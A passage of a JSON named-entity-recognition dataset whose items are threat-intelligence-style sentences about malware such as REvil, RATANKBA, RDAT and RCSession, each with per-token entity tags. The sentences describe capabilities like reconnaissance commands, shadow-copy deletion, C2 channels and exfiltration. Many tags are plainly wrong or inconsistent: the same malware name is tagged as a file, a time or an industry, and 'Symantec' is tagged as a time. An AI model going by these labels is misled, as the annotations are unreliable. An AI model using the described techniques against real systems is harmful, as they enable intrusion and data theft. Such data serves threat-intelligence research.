] }, { "tokens": [ "QuietSieve", "has", "the", "ability", "to", "execute", "payloads", "in", "a", "hidden", "window." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "download", "and", "execute", "payloads", "on", "a", "target", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "check", "C2", "connectivity", "with", "a", "`ping`", "to", "8.8.8.8", "(Google", "public", "DNS)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "identify", "and", "search", "networked", "drives", "for", "specific", "file", "name", "extensions." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "identify", "and", "search", "removable", "drives", "for", "specific", "file", "name", "extensions." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "has", "taken", "screenshots", "every", "five", "minutes", "and", "saved", "them", "to", "the", "user's", "local", "Application", "Data", "folder", "under", "`Temp\\SymbolSourceSymbols\\icons`", "or", "`Temp\\ModeAuto\\icons`." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QuietSieve", "can", "use", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RAPIDPULSE", "retrieves", "files", "from", "the", "victim", "system", "via", "encrypted", "commands", "sent", "to", "the", "web", "shell." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAPIDPULSE", "listens", "for", "specific", "HTTP", "query", "parameters", "in", "received", "communications.", "If", "specific", "parameters", "match,", "a", "hard-coded", "RC4", "key", "is", "used", "to", "decrypt", "the", "HTTP", "query", "paremter", "<code>hmacTime</code>.", "This", "decrypts", "to", "a", "filename", "that", "is", "then", "open,", "read,", "encrypted", "with", "the", "same", "RC4", "key,", "base64-encoded,", "written", "to", "standard", "out,", "then", "passed", "as", "a", "response", "to", "the", "HTTP", "request." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAPIDPULSE", "has", "the", "ability", "to", "RC4", "encrypt", "and", "base64", "encode", "decrypted", "files", "on", "compromised", "servers", "prior", "to", "writing", "them", "to", "stdout." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAPIDPULSE", "is", "a", "web", "shell", "that", "is", "capable", "of", "arbitrary", "file", "read", "on", "targeted", "web", "servers", "to", "exfiltrate", "items", "of", "interest", "on", "the", "victim", "device." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "decrypting", "itself", "in", "memory,", "RARSTONE", "downloads", "a", "DLL", "file", "from", "its", "C2", "server", "and", "loads", "it", "in", "the", "memory", "space", "of", "a", "hidden", "Internet", "Explorer", "process.", "This", "“downloaded”", "file", "is", "actually", "not", "dropped", "onto", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RARSTONE", "obtains", "installer", "properties", "from", "Uninstall", "Registry", "Key", "entries", "to", "obtain", "information", "about", "installed", "applications", "and", "how", "to", "uninstall", "certain", "applications." ], "ner_tags": [ "B-Way", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RARSTONE", "downloads", "its", "backdoor", "component", "from", "a", "C2", "server", "and", "loads", "it", "directly", "into", "memory." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RARSTONE", "uses", "SSL", "to", "encrypt", "its", "communication", "with", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "performs", "a", "reflective", "DLL", "injection", "using", "a", "given", "pid." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uploads", "and", "downloads", "information." ], "ner_tags": [ "B-Way", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "RATANKBA", "uses", "the", "<code>net", "user</code>", "command." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "There", "is", "a", "variant", "of", "RATANKBA", "that", "uses", "a", "PowerShell", "script", "instead", "of", "the", "traditional", "PE", "form." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "lists", "the", "system’s", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "the", "command", "<code>reg", "query", "“HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings”</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "runs", "the", "<code>net", "view", "/domain</code>", "and", "<code>net", "view</code>", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "gathers", "information", "about", "the", "OS", "architecture,", "OS", "name,", "and", "OS", "version/Service", "pack." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "gathers", "the", "victim’s", "IP", "address", "via", "the", "<code>ipconfig", "-all</code>", "command." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "<code>netstat", "-ano</code>", "to", "search", "for", "specific", "IP", "address", "ranges." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "RATANKBA", "runs", "the", "<code>whoami</code>", "and", "<code>query", "user</code>", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "<code>tasklist", "/svc</code>", "to", "display", "running", "tasks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "HTTP/HTTPS", "for", "command", "and", "control", "communication." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "cmd.exe", "to", "execute", "commands." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "RATANKBA", "uses", "WMI", "to", "perform", "process", "monitoring." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "bypass", "UAC", "to", "escalate", "privileges." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "be", "installed", "via", "DLL", "side-loading." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg" ] }, { "tokens": [ "RCSession", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "use", "an", "encrypted", "beacon", "to", "check", "in", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "compress", "and", "obfuscate", "its", "strings", "to", "evade", "detection", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "remove", "files", "from", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "store", "its", "obfuscated", "configuration", "file", "in", "the", "Registry", "under", "`HKLM\\SOFTWARE\\Plus`", "or", "`HKCU\\SOFTWARE\\Plus`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "RCSession", "has", "the", "ability", "to", "drop", "additional", "files", "to", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "has", "the", "ability", "to", "capture", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "has", "used", "a", "file", "named", "English.rtf", "to", "appear", "benign", "on", "victim", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "write", "its", "configuration", "file", "to", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RCSession", "has", "the", "ability", "to", "execute", "inside", "the", "msiexec.exe", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "RCSession", "can", "use", "WinSock", "API", "for", "communication", "including", "<code>WSASend</code>", "and", "<code>WSARecv</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "RCSession", "has", "the", "ability", "to", "use", "TCP", "and", "UDP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "identify", "processes", "based", "on", "PID." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "launch", "itself", "from", "a", "hollowed", "svchost.exe", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RCSession", "has", "the", "ability", "to", "modify", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "capture", "screenshots", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "gather", "system", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "gather", "system", "owner", "information,", "including", "user", "and", "administrator", "privileges." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RCSession", "can", "use", "`cmd.exe`", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "has", "used", "DNS", "to", "communicate", "with", "the", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "RDAT", "has", "used", "encoded", "data", "within", "subdomains", "as", "AES", "ciphertext", "to", "communicate", "from", "the", "host", "to", "the", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "upload", "a", "file", "via", "HTTP", "POST", "response", "to", "the", "C2", "split", "into", "102,400-byte", "portions.", "RDAT", "can", "also", "download", "data", "from", "the", "C2", "which", "is", "split", "into", "81,920-byte", "portions." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "deobfuscate", "the", "base64-encoded", "and", "AES-encrypted", "files", "downloaded", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "exfiltrate", "data", "gathered", "from", "the", "infected", "system", "via", "the", "established", "Exchange", "Web", "Services", "API", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "has", "used", "HTTP", "if", "DNS", "C2", "communications", "were", "not", "functioning." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "issue", "SOAP", "requests", "to", "delete", "already", "processed", "C2", "emails.", "RDAT", "can", "also", "delete", "itself", "from", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "download", "files", "via", "DNS." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "RDAT", "can", "use", "email", "attachments", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "has", "used", "Windows", "Video", "Service", "as", "a", "name", "for", "malicious", "services." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "has", "masqueraded", "as", "VMware.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "RDAT", "can", "communicate", "with", "the", "C2", "via", "subdomains", "that", "utilize", "base64", "with", "character", "substitutions." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "take", "a", "screenshot", "on", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "communicate", "with", "the", "C2", "via", "base32-encoded", "subdomains." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "also", "embed", "data", "within", "a", "BMP", "image", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "process", "steganographic", "images", "attached", "to", "email", "messages", "to", "send", "and", "receive", "C2", "commands.", "RDAT", "can", "also", "embed", "additional", "messages", "within", "BMP", "images", "to", "communicate", "with", "the", "RDAT", "operator." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RDAT", "has", "used", "AES", "ciphertext", "to", "encode", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "can", "use", "HTTP", "communications", "for", "C2,", "as", "well", "as", "using", "the", "WinHTTP", "library", "to", "make", "requests", "to", "the", "Exchange", "Web", "Services", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDAT", "has", "executed", "commands", "using", "<code>cmd.exe", "/c</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "RDAT", "has", "created", "a", "service", "when", "it", "is", "installed", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDFSNIFFER", "hooks", "several", "Win32", "API", "functions", "to", "hijack", "elements", "of", "the", "remote", "system", "management", "user-interface." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDFSNIFFER", "has", "the", "capability", "of", "deleting", "local", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "RDFSNIFFER", "has", "used", "several", "Win32", "API", "functions", "to", "interact", "with", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "encrypted", "C2", "communications", "with", "the", "ECIES", "algorithm." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "REvil", "can", "launch", "an", "instance", "of", "itself", "with", "administrative", "rights", "using", "runas." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "REvil", "has", "the", "capability", "to", "destroy", "files", "and", "folders." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "REvil", "can", "encrypt", "files", "on", "victim", "systems", "and", "demands", "a", "ransom", "to", "decrypt", "the", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "decode", "encrypted", "strings", "to", "enable", "execution", "of", "commands", "and", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-HackOrg" ] }, { "tokens": [ "REvil", "can", "connect", "to", "and", "disable", "the", "Symantec", "server", "on", "the", "victim's", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "identify", "the", "domain", "membership", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "infected", "victim", "machines", "through", "compromised", "websites", "and", "exploit", "kits." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "REvil", "has", "used", "encrypted", "strings", "and", "configuration", "files." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "REvil", "can", "exfiltrate", "host", "and", "malware", "information", "to", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "mark", "its", "binary", "code", "for", "deletion", "after", "reboot." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "the", "ability", "to", "identify", "specific", "files", "and", "directories", "that", "are", "not", "to", "be", "encrypted." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "save", "encryption", "parameters", "and", "system", "information", "in", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "download", "a", "copy", "of", "itself", "from", "an", "attacker", "controlled", "IP", "address", "to", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "use", "vssadmin", "to", "delete", "volume", "shadow", "copies", "and", "bcdedit", "to", "disable", "recovery", "features." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "been", "executed", "via", "malicious", "MS", "Word", "e-mail", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-Way", "B-Way" ] }, { "tokens": [ "REvil", "can", "mimic", "the", "names", "of", "known", "executables." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "modify", "the", "Registry", "to", "save", "encryption", "parameters", "and", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "use", "Native", "API", "for", "execution", "and", "to", "retrieve", "active", "services." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "REvil", "has", "used", "PowerShell", "to", "delete", "volume", "shadow", "copies", "and", "download", "files." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "inject", "itself", "into", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "query", "the", "Registry", "to", "get", "random", "file", "extensions", "to", "append", "to", "encrypted", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "force", "a", "reboot", "in", "safe", "mode", "with", "networking." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "the", "capability", "to", "stop", "services", "and", "kill", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Features" ] }, { "tokens": [ "REvil", "has", "been", "distributed", "via", "malicious", "e-mail", "attachments", "including", "MS", "Word", "Documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-SamFile", "B-SecTeam" ] }, { "tokens": [ "REvil", "can", "identify", "the", "username,", "machine", "name,", "system", "language,", "keyboard", "layout,", "OS", "version,", "and", "system", "drive", "information", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "check", "the", "system", "language", "using", "<code>GetUserDefaultUILanguage</code>", "and", "<code>GetSystemDefaultUILanguage</code>.", "If", "the", "language", "is", "found", "in", "the", "list,", "the", "process", "terminates." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "enumerate", "active", "services." ], "ner_tags": [ "B-Way", "O", "O", "I-Idus", "O" ] }, { "tokens": [ "REvil", "can", "obtain", "the", "token", "from", "the", "user", "that", "launched", "the", "explorer.exe", "process", "to", "avoid", "affecting", "the", "desktop", "of", "the", "SYSTEM", "user." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Org" ] }, { "tokens": [ "REvil", "has", "used", "obfuscated", "VBA", "macros", "for", "execution." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "REvil", "has", "used", "HTTP", "and", "HTTPS", "in", "communication", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "use", "the", "Windows", "command", "line", "to", "delete", "volume", "shadow", "copies", "and", "disable", "recovery." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "REvil", "can", "use", "WMI", "to", "monitor", "for", "and", "kill", "specific", "processes", "listed", "in", "its", "configuration", "file." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "encrypts", "files", "with", "XOR", "before", "sending", "them", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "decodes", "Base64", "strings", "and", "decrypts", "strings", "using", "a", "custom", "XOR", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "RGDoor", "establishes", "persistence", "on", "webservers", "as", "an", "IIS", "module." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "uploads", "and", "downloads", "files", "to", "and", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "executes", "the", "<code>whoami</code>", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RGDoor", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT12", "has", "used", "the", "RIPTIDE", "RAT,", "which", "communicates", "over", "HTTP", "with", "a", "payload", "encrypted", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT12", "has", "used", "RIPTIDE,", "a", "RAT", "that", "uses", "HTTP", "to", "communicate." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ROADTools", "automatically", "gathers", "data", "from", "Azure", "AD", "environments", "using", "the", "Azure", "Graph", "API." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "ROADTools", "can", "enumerate", "Azure", "AD", "users." ], "ner_tags": [ "B-Way", "O", "O", "B-Org", "B-HackOrg", "B-Org" ] }, { "tokens": [ "ROADTools", "leverages", "valid", "cloud", "credentials", "to", "perform", "enumeration", "operations", "using", "the", "internal", "Azure", "AD", "Graph", "API." ], "ner_tags": [ "B-SamFile", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "ROADTools", "can", "enumerate", "Azure", "AD", "groups." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "I-HackOrg", "O" ] }, { "tokens": [ "ROADTools", "can", "enumerate", "Azure", "AD", "applications", "and", "service", "principals." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROADTools", "can", "enumerate", "Azure", "AD", "systems", "and", "devices." ], "ner_tags": [ "B-SamFile", 